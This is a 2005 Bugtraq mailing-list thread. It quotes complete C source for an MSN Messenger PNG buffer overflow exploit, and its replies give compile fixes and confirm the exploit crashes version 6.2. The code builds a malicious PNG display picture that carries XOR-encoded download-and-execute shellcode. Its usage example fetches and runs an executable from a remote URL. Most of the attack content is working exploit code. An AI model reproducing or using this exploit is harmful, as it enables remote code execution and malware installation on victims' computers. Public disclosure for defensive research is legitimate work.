RE: MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit

From: Color Inc. (neoexitus_at_hotmail.com)
Date: 02/10/05

  • Next message: Shiva Persaud: "Re: iDEFENSE Security Advisory 02.10.05: IBM AIX netpmon Local Buffer Overflow Vulnerability"
    To: bugtraq@securityfocus.com
    Date: Thu, 10 Feb 2005 19:24:06 +0000
    
    

    I compiled the code without having to change line 124, only had 2 warnings,
    which were not critical. The vuln.png file was generated, when I put it as
    my Display Picture I get:
    "I'm compiled with VC6 and just 1024 bytes big :)"
    then MSN Messenger crashes.

    I'm using MSN Messenger 6.2.0137

    >From: "Andrew Hunter" <andiroohunter@msn.com>
    >To: bugtraq@securityfocus.com
    >Subject: RE: MSN Messenger PNG Image Buffer Overflow Download Shellcoded
    >Exploit
    >Date: Wed, 09 Feb 2005 19:51:26 +0000
    >
    >I had problems getting your code to compile, a few modifications were
    >needed!
    >I did get it to compile in MS VC++, and in Dev C++
    >
    >You need to make the following adjustments.
    >
    >Line 124:
    >newshellcode = new char[sizeof(shellcode)+strlen(web)+1];
    >
    >Change it to the following:
    >newshellcode = malloc((sizeof(shellcode)+strlen(web)+1));
    >
    >
    >That is how i got it to sucessfully compile and make vuln.png
    >
    >Unfortunatly MSN would let me load the .png as my display picture? I am
    >using MSN 7 so that is probbobly why, i will down grade to MSN 6 and try
    >again.
    >
    >>From: ATmaCA ATmaCA <atmaca@atmacasoft.com>
    >>To: bugtraq@securityfocus.com
    >>Subject: MSN Messenger PNG Image Buffer Overflow Download Shellcoded
    >>Exploit
    >>Date: 9 Feb 2005 14:06:29 -0000
    >>MIME-Version: 1.0
    >>Received: from [205.206.231.27] ([205.206.231.27]) by mc7-f27.hotmail.com
    >>with Microsoft SMTPSVC(6.0.3790.211); Wed, 9 Feb 2005 08:55:46 -0800
    >>Received: from no.name.available by [205.206.231.27] via smtpd
    >>(for [65.54.253.99] [65.54.253.99]) with ESMTP; Wed, 9 Feb 2005 08:55:47
    >>-0800
    >>Received: from lists2.securityfocus.com (lists2.securityfocus.com
    >>[205.206.231.20])by outgoing3.securityfocus.com (Postfix) with QMQPid
    >>93494236F46; Wed, 9 Feb 2005 09:39:39 -0700 (MST)
    >>Received: (qmail 20604 invoked from network); 9 Feb 2005 06:20:36 -0000
    >>X-Message-Info: JGTYoYF78jGdL+F1rUGY1q5Vec9LnW/lXD+aujlifHY=
    >>Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
    >>Precedence: bulk
    >>List-Id: <bugtraq.list-id.securityfocus.com>
    >>List-Post: <mailto:bugtraq@securityfocus.com>
    >>List-Help: <mailto:bugtraq-help@securityfocus.com>
    >>List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
    >>List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
    >>Delivered-To: mailing list bugtraq@securityfocus.com
    >>Delivered-To: moderator for bugtraq@securityfocus.com
    >>X-Mailer: MIME-tools 5.411 (Entity 5.404)
    >>Return-Path: bugtraq-return-18024-andiroohunter=msn.com@securityfocus.com
    >>X-OriginalArrivalTime: 09 Feb 2005 16:55:46.0679 (UTC)
    >>FILETIME=[334BF070:01C50EC8]
    >>
    >>
    >>
    >>/*
    >>*
    >>* MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit
    >>* Bug discoveried by Core Security Technologies (www.coresecurity.com)
    >>* Exploit coded By ATmaCA
    >>* Copyright 2002-2005 AtmacaSoft Inc. All Rights Reserved.
    >>* Web: http://www.atmacasoft.com
    >>* E-Mail: atmaca@icqmail.com
    >>* Credit to kozan and delikon
    >>* Usage:exploit <OutputPath> <Url>
    >>*
    >>*/
    >>
    >>/*
    >>*
    >>* Tested with MSN Messenger 6.2.0137
    >>* This vulnerability can be exploited on Windows 2000 (all service packs)
    >>* and Windows XP (all service packs) that run vulnerable
    >>* clients of MSN Messenger.
    >>*
    >>*/
    >>
    >>/*
    >>*
    >>* After creating vuln png image, open
    >>* MSN Messenger and select it as your display picture in
    >>* "Tools->Change Display Picture".
    >>*
    >>*/
    >>
    >>#include <stdio.h>
    >>#include <stdlib.h>
    >>#include <conio.h>
    >>#include <string.h>
    >>
    >>
    >>#ifdef __BORLANDC__
    >> #include <mem.h>
    >>#endif
    >>
    >>#define NOP 0x90
    >>
    >>char png_header[] =
    >>"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52"
    >>"\x00\x00\x00\x40\x00\x00\x00\x40\x08\x03\x00\x00\x00\x9D\xB7\x81"
    >>"\xEC\x00\x00\x01\xB9\x74\x52\x4E\x53";
    >>
    >>char pngeof[] = "\x90\x90\x90\x59\xE8\x47\xFE\xFF\xFF";
    >>
    >>/* Generic win32 http download shellcode
    >> xored with 0x1d by delikon (http://delikon.de/) */
    >>char shellcode[] = "\xEB"
    >>"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
    >>"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"
    >>"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"
    >>"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
    >>"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
    >>"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"
    >>"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"
    >>"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"
    >>"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
    >>"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"
    >>"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"
    >>"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"
    >>"\x78\x65\x78\x1D";
    >>
    >>FILE *di;
    >>int i = 0;
    >>short int weblength;
    >>char *web;
    >>char *pointer = NULL;
    >>char *newshellcode;
    >>
    >>/*xor cryptor*/
    >>char *Sifrele(char *Name1)
    >>{
    >> char *Name=Name1;
    >> char xor=0x1d;
    >> int Size=strlen(Name);
    >> for(i=0;i<Size;i++)
    >> Name[i]=Name[i]^xor;
    >> return Name;
    >>}
    >>
    >>
    >>void main(int argc, char *argv[])
    >>{
    >>
    >> if (argc < 3)
    >> {
    >> printf("MSN Messenger PNG Image Buffer Overflow Download
    >>Shellcoded Exploit\n");
    >> printf("Bug discoveried by Core Security Technologies
    >>(www.coresecurity.com)\n");
    >> printf("Exploit coded By ATmaCA\n");
    >> printf("Copyright 2002-2005 AtmacaSoft Inc. All Rights
    >>Reserved.\n");
    >> printf("Web: http://www.atmacasoft.com\n");
    >> printf("E-Mail: atmaca@icqmail.com\n");
    >> printf("Credit to kozan and delikon\n\n");
    >> printf("\tUsage:exploit <OutputPath> <Url>\n");
    >> printf("\tExample:exploit vuln.png
    >>http://www.atmacasoft.com/exp/msg.exe\n");
    >>
    >> return;
    >> }
    >>
    >>
    >> web = argv[2];
    >>
    >>
    >> if( (di=fopen(argv[1],"wb")) == NULL )
    >> {
    >> printf("Error opening file!\n");
    >> return;
    >> }
    >> for(i=0;i<sizeof(png_header)-1;i++)
    >> fputc(png_header[i],di);
    >>
    >> /*stuff in a couple of NOPs*/
    >> for(i=0;i<99;i++)
    >> fputc(NOP,di);
    >>
    >> weblength=(short int)0xff22;
    >> pointer=strstr(shellcode,"\x22\xff");
    >> weblength-=strlen(web)+1;
    >> memcpy(pointer,&weblength,2);
    >> newshellcode = new char[sizeof(shellcode)+strlen(web)+1];
    >> strcpy(newshellcode,shellcode);
    >> strcat(newshellcode,Sifrele(web));
    >> strcat(newshellcode,"\x1d");
    >>
    >> //shell code
    >> for(i=0;i<strlen(newshellcode);i++)
    >> fputc(newshellcode[i],di);
    >>
    >>
    >> for(i=0;i<(83-strlen(web));i++) //NOPs
    >> fputc(NOP,di);
    >>
    >> /*Overwriting the return address (EIP)*/
    >> /*0x005E0547 - ret */
    >> fputc(0x47,di);
    >> fputc(0x05,di);
    >> fputc(0x5e,di);
    >> fputc(0x00,di);
    >>
    >> for(i=0;i<sizeof(pngeof)-1;i++)
    >> fputc(pngeof[i],di);
    >>
    >> printf("Vulnarable png file %s has been generated!\n",argv[1]);
    >>
    >> fclose(di);
    >>}
    >>
    >
    >


  • Next message: Shiva Persaud: "Re: iDEFENSE Security Advisory 02.10.05: IBM AIX netpmon Local Buffer Overflow Vulnerability"

    Relevant Pages

    • RE: MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit
      ... I did get it to compile in MS VC++, ... >* MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit ...
      (Bugtraq)
    • hdd error
      ... everytime i compile any program, or make world, it gives me that: ... anyone knows what's that ?thx ... Express yourself instantly with MSN Messenger! ... Download today it's FREE! ...
      (freebsd-questions)
    • RE: Redhat 9.0 development environment wierdness...
      ... It still has the warnings you posted. ... setup depends on you or the project you are trying to compile. ... Redhat 9.0 development environment wierdness... ... need to install on our servers and if I can't even get through these I ...
      (RedHat)
    • Re: does VS C++ 2005 actually work????
      ... may be the same size as a pointer, they have nothing logically to do with ... sizeofand size_t generating warnings when used in the context of API ... I can't compile ... justified criticism regarding the reliability of Windows. ...
      (microsoft.public.vc.mfc)
    • Re: 2.6.23.9-rt13
      ... If I compile -rt13 I get some compile warnings on ARM: ... Both warnings are fixed by the attached patch, but warning 2 needs some review. ... New changes by Steven Rostedt, Gregory Haskins, ... Revert lazy disable irq from simple irq handler ...
      (Linux-Kernel)